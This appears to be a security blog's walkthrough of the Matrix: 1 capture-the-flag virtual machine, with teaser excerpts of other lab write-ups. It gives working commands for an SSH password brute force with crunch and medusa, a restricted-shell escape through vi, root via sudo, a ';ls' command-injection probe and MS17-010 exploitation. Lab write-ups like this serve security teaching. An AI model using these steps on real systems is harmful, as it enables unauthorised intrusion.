Matrix: 1 Walkthrough

Lab Environment
Attacker’s Machine : Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux
Vulnerable Machine : Matrix: 1
Let’s start hacking and breach the security of this machine
Scanning Phase : Let’s start with knowing our attacking machine’s ip
       Syntax used : ifconfig
               Results : 192.168.169.136


Now let’s scan our local network to which attacking machine and vulnerable machine is connected.
     Syntax used : arp-scan --local


Enumeration Phase : Now using nmap to scan the services running on ports .
Syntax used : nmap -A 192.168.169.135 -Pn
     Results   : http service is running on port 80 and port 31337
 
Now browsing ip in web browser to see the webpage on port 80 and got nothing useful




Now tried to browse with port 31337 and got something in source code .
Viewed source code by pressing ctrl+u
Results : we got base64 encoded value
Value : ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=


Now it’s time to decode the base64 value in terminal
Syntax used : echo “ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=” | base64 -d
Results : Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix





Now browsed the url again including Cypher.matrix
Results : got one file named Cypher.matrix




Opening file in leafpad using terminal .
Syntax used : leafpad Cypher.matrix




The value is encoded with brainfuck encryption


It’s decoding time
Using www.splitbrain.org to decode the encoded value
Results : You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.



Now generating wordlist with crunch
Syntax used : crunch 8 8 -t k1ll0r%@ -o /root/Desktop/passwd.txt
Explanation : 8 8 defines min and max length of password to be generated
% defines all possible permutations of number
@ defines all possible permutations of lowercase characters
O is to define the location of output with filename




Now i will be using medusa to brute force on ssh login as we have our username as guest and for password we have wordlist passwd.txt
Syntax used : medusa -h 192.168.169.135 -u guest -P /root/Desktop/passwd.txt -M ssh
Explanation : h  defines host to be brute forced ,  u defines username , P defines password file , M defines module (example ssh , ftp etc.) here we want to bruteforce ssh .
Results : Password k1ll0r7n




Now login ssh using username as guest  and password as k1ll0r7n
Syntax used : ssh guest@192.168.169.135
Password : k1ll0r7n
Results : we got into the machine


After login we tried ls but command not found so we checked the PATH variable and found the path as /home/guest/prog
Syntax used : $PATH
So i just used echo to know the all  executables inside ,if any
Syntax used : echo /home/guest/prog/*
Explanation : * defines all
Results : /home/guest/prog/vi
So we can run vi and escape the restricted shell by spawning it




So now just run vi by typing vi in terminal and cli will be opened and then spawned /bin/bash
By typing following in interface :!/bin/bash and press enter to exit the current interface


Now exporting /bin/bash to SHELL environment variable  and /usr/bin to PATH environment variable
Syntax used : export SHELL=/bin/bash:$SHELL
export PATH=/usr/bin:$PATH


Now exported /bin directory to PATH environment
And executed sudo su to switch user to root ,and password is k1ll0r7n and it’s root


Explored the directories and found flag.txt in root folder,read that file using cat command
Syntax used : cat flag.txt

Popular posts from this blog

Calculat3 M3 | CTF Learn

Image
This walkthrough will demonstrate the simple challenge based on command injection Calculat3 M3 This is the challenge page we got after visiting the given link. I provided random input in this calculator and intercepted the request with BurpSuite I got one parameter "expression" taking the values  Tried for command injection with ";ls" Forwarding the above request finally Got the Flag
Read more

TryHackme: Blue Walkthrough

Image
Task 1: Recon After we've connected to the tryhackme network the first task is to enumerate the target. We use Nmap for scanning the target IP. Command Used : nmap -sS -Pn <target-ip> -sS : Scan using TCP SYN scan -Pn : Treats all host as online --skip host discovery Next we used a command to find the vulnerability on the target machine. Command Used : nmap --script vuln <target-ip> --script : Specify the --script option to choose your own scripts to execute by providing categories , script file names, or the name of directories full of scripts you wish to execute. vuln : These scripts check for known vulnerabilites and generally only report results if they are found. Below, we see that nmap is indicating the target may be vulnerable to ms17-010(on the left0 and we can verify this using metasploit. To start Metasploit use command "msfconsole" We start by simply doing a search for ms17-010 Here we use module 2 i.e. exploit/windows...
Read more

HackTheBox-Traceback Walkthrough

Image
I started with scanning the IP Addr with nmap using the simple command. Command Used: nmap IP Addr of machine -Pn  nmap 10.10.10.181 -Pn  Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-15 02:27 IST Nmap scan report for 10.10.10.181 Host is up (0.18s latency). Not shown: 998 closed ports PORT   STATE SERVICE 22/tcp open  ssh 80/tcp open  http Now only two things were in my mind and those were what should I enumerate first ssh or http. SSH can only be bruteforced and this point and bruteforce on the online machine doesn't works or we can say that most online hosted machines are not made to be bruteforced. So, I started  with HTTP. I fired up directory burster to find juicy directories if any and mean while I decided to browse the IP Addr since HTTP Service is active and running. I was presented with the below screen  dirb was not able to find any directories ...
Read more